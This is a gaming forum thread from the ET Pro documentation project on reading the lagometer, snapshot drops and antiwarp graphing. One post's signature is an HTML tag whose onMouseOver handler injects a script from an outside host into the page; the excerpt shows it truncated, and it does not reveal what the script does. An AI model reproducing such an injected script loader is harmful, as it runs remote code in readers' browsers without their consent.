How to read the lagometer

ET Pro Documentation Project

Moderators: Forum moderators, developers, ET Pro Documentation

Rain

Post by Rain »

I'll try to remember to update my post a bit when I'm coherent. Reading about a week's worth of back forum posts does not do much for one's coherency.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
faltytower

Post by faltytower »

The client system knows the order of snapshots, thus, it retroactively knows when they have been dropped (e.g. if the last valid snapshot was number 8, and the next valid snapshot was number ten, it is safe to say number 9 was dropped), and puts red lines in the lagometer to represent this. See void CG_ProcessSnapshots( void ) in src/cgame/cg_snapshot.c

This is exactly what happens when you scroll the server console... the top portion of the clients lagometer goes yellow (because there are no new snapshots to intererpolate) and the bottom stops advancing.

this probably doesn't belong in the documentation thread....
The process is more asynchronous. Turn on showpackets, showdrop, cg_drawsnapshot. Server and client have to acknowledge each snap sent/recieved. If the client received 10 and acknowledge 8, that's when the server send the notification (in the form of "IP: x #packet loss at recieved time t").
Societal Eclipse

Post by Societal Eclipse »

Could someone please update this thread to show the new antiwarp graphing? I'm guessing the darker green field above the regular light green is showing how high your ping is faked to while antiwarp is acting. The light green would still be your actual ping regardless of what the server is using for you right?
IdNotFound

Post by IdNotFound »

Societal Eclipse wrote:Could someone please update this thread to show the new antiwarp graphing? I'm guessing the darker green field above the regular light green is showing how high your ping is faked to while antiwarp is acting. The light green would still be your actual ping regardless of what the server is using for you right?
Bingo.
Image nZ/IdNotFound
NaZGûL TeaM Leader
SAWL Tech Staff